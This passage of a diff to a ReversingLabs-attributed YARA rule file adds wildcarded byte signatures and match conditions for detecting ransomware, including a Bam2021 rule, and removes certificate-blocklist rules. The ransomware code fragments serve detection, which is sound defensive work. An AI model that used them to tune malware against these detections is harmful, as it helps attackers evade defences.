+            ?? ?? ?? 50 51 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 3B F3 0F 84 ?? ?? ?? ?? 6A ?? 8D
+            54 24 ?? 52 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 48
+            ?? 8B 40 ?? 53 68 ?? ?? ?? ?? 51 53 53 8D 94 24 ?? ?? ?? ?? 52 50 56 FF 15
+        }
+		$server_communication_4_1b_5 = {
+            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C
+            24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 15 ?? ?? ?? ?? 88 9C 04 ?? ??
+            ?? ?? 88 9C 04 ?? ?? ?? ?? 8B 42 ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 4C 24 ?? 51 FF D6 8B 7C 24 ?? 47 89 7C
+            24 ?? 83 FF ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15
+        }
+		$file_search_4_2_1 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
+            FF 70 ?? 8D 85 ?? ?? ?? ?? 50 FF D3 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
+        }
+		$file_search_4_2_2 = {
+            FF D3 8B 35 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 FF D7 6A ?? 8D 45 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            66 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51
+            6A ?? FF D3
+        }
+		$server_communication_4_2_1 = {
+            FF 15 ?? ?? ?? ?? 8B F0 0F 57 C0 8D 84 24 ?? ?? ?? ?? 66 0F 7F 84 24 ?? ?? ?? ?? 50
+            8D 84 24 ?? ?? ?? ?? 8B D6 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B CE E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            56 FF 15
+        }
+		$server_communication_4_2_2 = {
+            FF D7 8B 0D ?? ?? ?? ?? 8B D0 8B 49 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ??
+            50 FF D7
+        }
+		$server_communication_4_2_3 = {
+            6A ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 6A ?? 56 FF 54 24 ?? 8B 0D ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 41 ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 71
+            ?? 56 FF 54 24
+        }
+		$server_communication_4_2_4 = {
+            FF 54 24 ?? 8B 44 24 ?? 66 C7 84 04 ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? FF 70 ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 8B 7C 24 ?? FF D7 56 FF
+            D7
+        }
+		$server_communication_4_2_5 = {
+            57 8B 7C 24 ?? FF D7 56 FF D7 FF 74 24 ?? FF D7 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            6A ?? FF 15
+        }
+		$server_communication_3_1 = {
+            8A 08 40 3A CB 75 ?? 2B C7 50 8D 94 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? EB
+        }
+		$server_communication_3_2 = {
+            68 ?? ?? ?? ?? 88 9C 04 ?? ?? ?? ?? 51 88 9C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 8B 7C 24 ?? 83 C7 ?? 89 7C 24 ??
+            81 FF ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 39 1D ?? ?? ??
+            ?? 75 ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15
+        }
+		$file_search_3_1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? [0-1] 56 57 33 C0
+            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8
+        }
+		$file_search_3_1_1 = {
+            FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ??
+            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
+        }
+		$file_search_3_1_2 = {
+            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 8D ?? ?? ?? ?? 51 FF D7 6A ?? 8D 95 ?? ?? ?? ??
+            6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A
+            ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
+            85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 85 C0 74 ?? E8
+        }
+		$file_search_3_2_1 = {
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            50 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ??
+            ?? ?? ?? 83 FF ?? 0F 85
+        }
+		$file_search_3_2_2 = {
+            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ??
+            ?? FF D6 6A ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? FF D7 85 C0 74 ?? E8
+        }
+		$search_and_encrypt_3_1 = {
+            8B C3 83 C4 ?? 8D 50 ?? [1-3] 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
+            ?? 68 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ??
+            ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
+        }
+		$search_and_encrypt_3_2 = {
+            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
+            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
+            75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
+            ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+        }
+		$search_and_encrypt_3_3 = {
+            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 53
+            8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D ?? ??
+            ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ??
+            ?? ?? 68 ?? ?? ?? ?? ?? E8
+        }
+		$search_and_encrypt_3_4 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B CE E8
+            ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C6 E8 ??
+            ?? ?? ?? 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WORK PLACEMENTS INTERNATIONAL LIMITED" and ( pe.signatures [ i ] . serial == "00:8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" or pe.signatures [ i ] . serial == "8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" ) and 1570626662 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_2_6a_1 and $encrypt_file_0_2_6a_2 and $server_communication_0_2_6a_1 and $server_communication_0_2_6a_2 ) or ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_3_1 and $server_communication_0_3_1_1 and $server_communication_0_3_1_2 ) or ( $file_search_0_3_3_1 and $file_search_0_3_3_2 and $encrypt_file_0_3_3_1 and $encrypt_file_0_3_3_2 and $server_communication_0_3_3_1 and $server_communication_0_3_3_2 ) or ( $file_search_0_3_4a_1 and $file_search_0_3_4a_2 and $encrypt_file_0_3_4a_1 and $encrypt_file_0_3_4a_2 and $server_communication_0_3_4a_1 and $server_communication_0_3_4a_2 ) or ( $file_search_0_3_5a_1 and $file_search_0_3_5a_2 and $encrypt_file_0_3_5a_1 and $encrypt_file_0_3_5a_2 and $server_communication_0_3_5a_1 and $server_communication_0_3_5a_2 ) or ( $server_communication_2_0_4e and $search_and_encrypt_2_0_4e_1 and $search_and_encrypt_2_0_4e_2 and $search_and_encrypt_2_0_4e_3 and $search_and_encrypt_2_0_4e_4 and $search_and_encrypt_2_0_4e_5 ) or ( $server_communication_4_0_1 and $server_communication_4_0_2 and $server_communication_4_0_3 and $file_search_4_0_1 and $file_search_4_0_2 and $file_search_4_0_3 ) or ( $file_search_4_1b_1 and $file_search_4_1b_2 and $file_search_4_1b_3 and $server_communication_4_1b_1 and $server_communication_4_1b_2 and $server_communication_4_1b_3 and $server_communication_4_1b_4 and $server_communication_4_1b_5 ) or ( $file_search_4_2_1 and $file_search_4_2_2 and $server_communication_4_1b_1 and $server_communication_4_2_1 and $server_communication_4_2_2 and $server_communication_4_2_3 and $server_communication_4_2_4 and $server_communication_4_2_5 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_1_1 and $file_search_3_1_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_2_1 and $file_search_3_2_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ef2D35F2Ae82A767A16Be582Ab0D1Ba0 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bam2021 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Bam2021 ransomware."
 		author = "ReversingLabs"
-		id = "dc8f49b8-fda2-510c-8374-3261e75d11a9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "31ae99e3-223c-51fb-97c1-353ff063057f"
+		date = "2021-09-17"
+		modified = "2021-09-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5732-L5750"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0709290aeb18bcb855518e150c2768c24ab311f5c727cdc4c40145b879ff88b6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Bam2021.yara#L1-L167"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5b717510991b78f07806e88f3dfe1c27d6ec1ec21af61a7c4f1edf7c915785d5"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Bam2021"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Workstage Limited" and ( pe.signatures [ i ] . serial == "00:ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" or pe.signatures [ i ] . serial == "ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" ) and 1567123200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_039668034826Df47E6207Ec9Daed57C3 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c2a3477a-a4cf-586e-ba70-555cc577ab2c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5752-L5768"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "792860feec6e599ba22ae3869ef132cf5b7be2e0572e23503e293444fd7c382d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_shares = {
+            83 EC ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? FF D5 8B 74 24 ?? 6A ?? 56 C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24
+            ?? 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 89 06 33 C0 5F 5E
+            5D 5B 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85
+            FF 75 ?? 89 06 8B 44 24 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8D 4C 24
+            ?? 51 57 8D 54 24 ?? 52 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? ?? ?? 33 DB 39 5C
+            24 ?? 76 ?? 8D 77 ?? 90 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44
+            24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 06 50 C7 44 24 ?? ?? ?? ?? ?? 89 44 24
+            ?? FF D5 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 3E E8 ?? ??
+            ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 46 ?? 83 E0 ?? 3C ??
+            75 ?? 8B 4C 24 ?? 8B 44 24 ?? 51 8D 56 ?? 52 50 E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24
+            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 74 ?? 56 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 31 57 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 52 E8 ?? ?? ??
+            ?? 8B F0 85 F6 74 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 30 33
+            C0 5F 5E 5D 5B 83 C4 ?? C2
+        }
+		$find_files_p1 = {
+            8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8
+            ?? 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C5 0F 84 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 3B D5 74
+            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0
+            83 D8 ?? 3B C5 0F 84 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8C 24
+            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 9C 24 ?? ??
+            ?? ?? 8D 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 8D 8C 24
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? 8B 54 24 ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 66 89 44 24 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 54 24 ?? 8B 44 24 ?? 42 3B C2 77 ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 34 0A 3B C6 77 ?? 2B F0 8B 44 24 ?? 39 2C B0 75 ?? 6A
+            ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 04 B1 8B 54 24 ?? 8B 0C B2 89 4C 24 ?? 89
+        }
+		$find_files_p2 = {
+            4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 3B CD 74 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 89 69 ?? 6A
+            ?? 66 89 41 ?? 55 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 44
+            24 ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 47 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 16 52 8D 84 24 ??
+            ?? ?? ?? 50 FF D3 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? E9 ?? ?? ?? ?? 57 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 94 24 ?? ?? ?? ?? 2B D0 0F
+            B7 08 66 89 0C 02 83 C0 ?? 66 3B CD 75 ?? 33 C0 EB ?? 8D A4 24 ?? ?? ?? ?? 8D 49 ??
+            0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 33 C0 8D 9B
+            ?? ?? ?? ?? 0F B7 88 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 8B
+            5C 24 ?? 6A ?? B9 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8D 8C
+            24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
+            ?? ?? 64 A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 DB 3B C3 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0
+            83 C4 ?? 3B F3 74 ?? 68 ?? ?? ?? ?? 8D 46 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6
+            EB ?? 33 C0 A3 ?? ?? ?? ?? 8D 4C 24 ?? 51 8B F8 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 33 D2 53 89 9C 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 84 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 33 D2 53 50 66 89 54
+            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 47 ?? 83 C4 ?? 50 89 5C 24 ?? 89 44 24 ?? E8 ??
+            ?? ?? ?? 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B
+        }
+		$encrypt_files_p2 = {
+            F4 33 C9 8D 84 24 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 89 5E ?? 89 64 24 ?? 66 89 4E ??
+            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 94 24 ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 83 EC ?? 8B F4 33 C0 C7 46 ?? ?? ?? ?? ?? 89 5E ?? 66 89 46 ?? 8D 84 24
+            ?? ?? ?? ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
+            C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 8C 24
+            ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? ??
+            ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ??
+            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            57 E8 ?? ?? ?? ?? 53 6A ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ??
+            ?? ?? ?? 89 5E ?? 8D 44 24 ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ??
+            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 44 24 ?? E8 ?? ?? ?? ?? 57 E8 ??
+            ?? ?? ?? 53 6A ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
+            ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7
+        }
+		$encrypt_files_p3 = {
